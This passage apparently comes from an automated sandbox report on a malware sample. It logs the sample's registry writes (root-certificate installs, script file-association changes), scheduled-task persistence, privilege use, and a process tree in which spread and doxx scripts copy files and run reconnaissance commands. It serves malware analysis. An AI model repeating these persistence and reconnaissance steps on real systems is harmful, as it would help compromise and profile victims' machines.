"E7F56BC4FE1C21A9D178D0A48B7F9161" Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "193DC67F14E6DAB1B8BC7CE6ED9034CF" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" -
Processes:
3.exepsiphon-tunnel-core.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 3.exe -
NTFS ADS 1 IoCs
Processes:
description ioc Process File created C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe:ZoneIdentifier -
Runs net.exe
-
Runs ping.exe 1 TTPs 24 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 3432 PING.EXE 480 PING.EXE 2236 PING.EXE 1584 PING.EXE 2716 PING.EXE 1524 PING.EXE 748 292 PING.EXE 2376 PING.EXE 3104 PING.EXE 4088 PING.EXE 3712 PING.EXE 1288 PING.EXE 2216 PING.EXE 1628 PING.EXE 2264 PING.EXE 3352 PING.EXE 2680 2716 2736 PING.EXE 2968 PING.EXE 980 PING.EXE 4040 PING.EXE 3136 -
Runs regedit.exe 1 IoCs
Processes:
pid Process 2968 -
Scheduled Task/Job: Scheduled Task 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 1552 schtasks.exe 4092 schtasks.exe 1496 schtasks.exe 3876 1896 schtasks.exe 3708 schtasks.exe 1848 schtasks.exe 3148 2800 schtasks.exe 2040 schtasks.exe 2040 schtasks.exe 3628 3100 3980 schtasks.exe 2368 schtasks.exe 2744 schtasks.exe 656 schtasks.exe 3684 schtasks.exe 3764 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
vlc.exepid Process 1624 vlc.exe 2572 3156 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WinaeroTweaker-1.40.0.0-setup.tmppowershell.exepowershell.exeiexplore.exepid Process 3108 WinaeroTweaker-1.40.0.0-setup.tmp 3108 WinaeroTweaker-1.40.0.0-setup.tmp 768 powershell.exe 888 powershell.exe 1940 iexplore.exe 1940 iexplore.exe 1940 iexplore.exe 1940 iexplore.exe 1940 iexplore.exe 1940 iexplore.exe 3652 3652 3652 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2696 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
ac3.exemshta.exevlc.exepid Process 2164 ac3.exe 4064 mshta.exe 1624 vlc.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid Process 2028 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetaskkill.exeRover.exetaskkill.exetaskkill.exetaskkill.exescary.exeRomilyaa.exepowershell.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exepowershell.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeAUDIODG.EXERomilyaa.exeRomilyaa.exetaskkill.exeSolaraBootstrapper.exeUmbral.exewmic.exeRomilyaa.exedescription pid Process Token: SeDebugPrivilege 1928 tasklist.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 1764 Rover.exe Token: SeDebugPrivilege 3244 taskkill.exe Token: SeDebugPrivilege 3268 taskkill.exe Token: SeDebugPrivilege 3964 taskkill.exe Token: SeDebugPrivilege 4048 scary.exe Token: SeDebugPrivilege 2336 Romilyaa.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 2676 Romilyaa.exe Token: SeDebugPrivilege 3984 Romilyaa.exe Token: SeDebugPrivilege 2552 Romilyaa.exe Token: SeDebugPrivilege 564 Romilyaa.exe Token: SeDebugPrivilege 2948 Romilyaa.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 3672 Romilyaa.exe Token: SeDebugPrivilege 3012 Romilyaa.exe Token: SeDebugPrivilege 4028 Romilyaa.exe Token: SeDebugPrivilege 1976 Romilyaa.exe Token: 33 1164 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1164 AUDIODG.EXE Token: 33 1164 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1164 AUDIODG.EXE Token: SeDebugPrivilege 3252 Romilyaa.exe Token: SeDebugPrivilege 3184 Romilyaa.exe Token: SeDebugPrivilege 1936 taskkill.exe Token: SeDebugPrivilege 4000 SolaraBootstrapper.exe Token: SeDebugPrivilege 1540 Umbral.exe Token: SeIncreaseQuotaPrivilege 1628 wmic.exe Token: SeSecurityPrivilege 1628 wmic.exe Token: SeTakeOwnershipPrivilege 1628 wmic.exe Token: SeLoadDriverPrivilege 1628 wmic.exe Token: SeSystemProfilePrivilege 1628 wmic.exe Token: SeSystemtimePrivilege 1628 wmic.exe Token: SeProfSingleProcessPrivilege 1628 wmic.exe Token: SeIncBasePriorityPrivilege 1628 wmic.exe Token: SeCreatePagefilePrivilege 1628 wmic.exe Token: SeBackupPrivilege 1628 wmic.exe Token: SeRestorePrivilege 1628 wmic.exe Token: SeShutdownPrivilege 1628 wmic.exe Token: SeDebugPrivilege 1628 wmic.exe Token: SeSystemEnvironmentPrivilege 1628 wmic.exe Token: SeRemoteShutdownPrivilege 1628 wmic.exe Token: SeUndockPrivilege 1628 wmic.exe Token: SeManageVolumePrivilege 1628 wmic.exe Token: 33 1628 wmic.exe Token: 34 1628 wmic.exe Token: 35 1628 wmic.exe Token: SeDebugPrivilege 1520 Romilyaa.exe Token: SeIncreaseQuotaPrivilege 1628 wmic.exe Token: SeSecurityPrivilege 1628 wmic.exe Token: SeTakeOwnershipPrivilege 1628 wmic.exe Token: SeLoadDriverPrivilege 1628 wmic.exe Token: SeSystemProfilePrivilege 1628 wmic.exe Token: SeSystemtimePrivilege 1628 wmic.exe Token: SeProfSingleProcessPrivilege 1628 wmic.exe Token: SeIncBasePriorityPrivilege 1628 wmic.exe Token: SeCreatePagefilePrivilege 1628 wmic.exe Token: SeBackupPrivilege 1628 wmic.exe Token: SeRestorePrivilege 1628 wmic.exe Token: SeShutdownPrivilege 1628 wmic.exe Token: SeDebugPrivilege 1628 wmic.exe Token: SeSystemEnvironmentPrivilege 1628 wmic.exe Token: SeRemoteShutdownPrivilege 1628 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
iexplore.exeiexplore.exeefsui.exeWinaeroTweaker-1.40.0.0-setup.tmp3.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeGoogle.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeac3.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exevlc.exeRomilyaa.exeWScript.exeRomilyaa.exepid Process 2608 iexplore.exe 1940 iexplore.exe 2892 efsui.exe 2892 efsui.exe 2892 efsui.exe 3108 WinaeroTweaker-1.40.0.0-setup.tmp 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 2336 Romilyaa.exe 3904 3.exe 3904 3.exe 3904 3.exe 1940 iexplore.exe 2676 Romilyaa.exe 3984 Romilyaa.exe 2420 Google.exe 2552 Romilyaa.exe 564 Romilyaa.exe 2948 Romilyaa.exe 3672 Romilyaa.exe 3012 Romilyaa.exe 2164 ac3.exe 4028 Romilyaa.exe 1976 Romilyaa.exe 3252 Romilyaa.exe 3184 Romilyaa.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1520 Romilyaa.exe 2400 WScript.exe 1624 vlc.exe 1624 vlc.exe 2788 Romilyaa.exe 2652 3232 3232 3232 3080 352 2508 2696 2696 2696 2756 2756 2756 3900 2680 884 -
Suspicious use of SendNotifyMessage 63 IoCs
Processes:
efsui.exe3.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exevlc.exeRomilyaa.exeRomilyaa.exepid Process 2892 efsui.exe 2892 efsui.exe 2892 efsui.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 3904 3.exe 2336 Romilyaa.exe 3904 3.exe 3904 3.exe 3904 3.exe 2676 Romilyaa.exe 3984 Romilyaa.exe 2552 Romilyaa.exe 564 Romilyaa.exe 2948 Romilyaa.exe 3672 Romilyaa.exe 3012 Romilyaa.exe 4028 Romilyaa.exe 1976 Romilyaa.exe 3252 Romilyaa.exe 3184 Romilyaa.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1624 vlc.exe 1520 Romilyaa.exe 2788 Romilyaa.exe 2652 3232 3232 3232 3080 352 2508 2696 2696 2696 2756 2756 2756 3900 2680 884 3900 2680 2680 3900 884 884 1696 1696 1696 -
Suspicious use of SetWindowsHookEx 33 IoCs
Processes:
iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXE3.exeRomilyaa.exeIEXPLORE.EXEIEXPLORE.EXEvlc.exepid Process 2608 iexplore.exe 2608 iexplore.exe 1572 IEXPLORE.EXE 1572 IEXPLORE.EXE 1940 iexplore.exe 1940 iexplore.exe 1636 IEXPLORE.EXE 1636 IEXPLORE.EXE 3904 3.exe 3904 3.exe 2336 Romilyaa.exe 1940 iexplore.exe 1940 iexplore.exe 3240 IEXPLORE.EXE 3240 IEXPLORE.EXE 3240 IEXPLORE.EXE 3240 IEXPLORE.EXE 2360 IEXPLORE.EXE 2360 IEXPLORE.EXE 1624 vlc.exe 1636 IEXPLORE.EXE 1636 IEXPLORE.EXE 3196 3196 3196 3196 2828 2828 2572 2572 3156 2828 2828 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
vir.execmd.execmd.execmd.exenet.exenet.exeiexplore.exedescription pid Process procid_target PID 1716 wrote to memory of 1120 1716 vir.exe 31 PID 1716 wrote to memory of 1120 1716 vir.exe 31 PID 1716 wrote to memory of 1120 1716 vir.exe 31 PID 1716 wrote to memory of 1120 1716 vir.exe 31 PID 1120 wrote to memory of 2008 1120 cmd.exe 33 PID 1120 wrote to memory of 2008 1120 cmd.exe 33 PID 1120 wrote to memory of 2008 1120 cmd.exe 33 PID 1120 wrote to memory of 2008 1120 cmd.exe 33 PID 1120 wrote to memory of 3056 1120 cmd.exe 35 PID 1120 wrote to memory of 3056 1120 cmd.exe 35 PID 1120 wrote to memory of 3056 1120 cmd.exe 35 PID 1120 wrote to memory of 3056 1120 cmd.exe 35 PID 1120 wrote to memory of 1288 1120 cmd.exe 37 PID 1120 wrote to memory of 1288 1120 cmd.exe 37 PID 1120 wrote to memory of 1288 1120 cmd.exe 37 PID 1120 wrote to memory of 1288 1120 cmd.exe 37 PID 2008 wrote to memory of 580 2008 cmd.exe 38 PID 2008 wrote to memory of 580 2008 cmd.exe 38 PID 2008 wrote to memory of 580 2008 cmd.exe 38 PID 2008 wrote to memory of 580 2008 cmd.exe 38 PID 3056 wrote to memory of 2848 3056 cmd.exe 39 PID 3056 wrote to memory of 2848 3056 cmd.exe 39 PID 3056 wrote to memory of 2848 3056 cmd.exe 39 PID 3056 wrote to memory of 2848 3056 cmd.exe 39 PID 3056 wrote to memory of 2456 3056 cmd.exe 40 PID 3056 wrote to memory of 2456 3056 cmd.exe 40 PID 3056 wrote to memory of 2456 3056 cmd.exe 40 PID 3056 wrote to memory of 2456 3056 cmd.exe 40 PID 2008 wrote to memory of 1992 2008 cmd.exe 41 PID 2008 wrote to memory of 1992 2008 cmd.exe 41 PID 2008 wrote to memory of 1992 2008 cmd.exe 41 PID 2008 wrote to memory of 1992 2008 cmd.exe 41 PID 2456 wrote to memory of 1832 2456 net.exe 42 PID 2456 wrote to memory of 1832 2456 net.exe 42 PID 2456 wrote to memory of 1832 2456 net.exe 42 PID 2456 wrote to memory of 1832 2456 net.exe 42 PID 2008 wrote to memory of 2652 2008 cmd.exe 43 PID 2008 wrote to memory of 2652 2008 cmd.exe 43 PID 2008 wrote to memory of 2652 2008 cmd.exe 43 PID 2008 wrote to memory of 2652 2008 cmd.exe 43 PID 3056 wrote to memory of 2756 3056 cmd.exe 44 PID 3056 wrote to memory of 2756 3056 cmd.exe 44 PID 3056 wrote to memory of 2756 3056 cmd.exe 44 PID 3056 wrote to memory of 2756 3056 cmd.exe 44 PID 2756 wrote to memory of 2264 2756 net.exe 45 PID 2756 wrote to memory of 2264 2756 net.exe 45 PID 2756 wrote to memory of 2264 2756 net.exe 45 PID 2756 wrote to memory of 2264 2756 net.exe 45 PID 3056 wrote to memory of 1928 3056 cmd.exe 47 PID 3056 wrote to memory of 1928 3056 cmd.exe 47 PID 3056 wrote to memory of 1928 3056 cmd.exe 47 PID 3056 wrote to memory of 1928 3056 cmd.exe 47 PID 1120 wrote to memory of 1580 1120 cmd.exe 48 PID 1120 wrote to memory of 1580 1120 cmd.exe 48 PID 1120 wrote to memory of 1580 1120 cmd.exe 48 PID 1120 wrote to memory of 1580 1120 cmd.exe 48 PID 1120 wrote to memory of 2352 1120 cmd.exe 50 PID 1120 wrote to memory of 2352 1120 cmd.exe 50 PID 1120 wrote to memory of 2352 1120 cmd.exe 50 PID 1120 wrote to memory of 2352 1120 cmd.exe 50 PID 2608 wrote to memory of 1572 2608 iexplore.exe 53 PID 2608 wrote to memory of 1572 2608 iexplore.exe 53 PID 2608 wrote to memory of 1572 2608 iexplore.exe 53 PID 2608 wrote to memory of 1572 2608 iexplore.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 -
outlook_win_path 1 IoCs
Processes:
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\!main.cmd" "2⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:580
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:1992
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- Enumerates system info in registry
PID:2652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
PID:2848
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵PID:1832
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵PID:2264
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
-
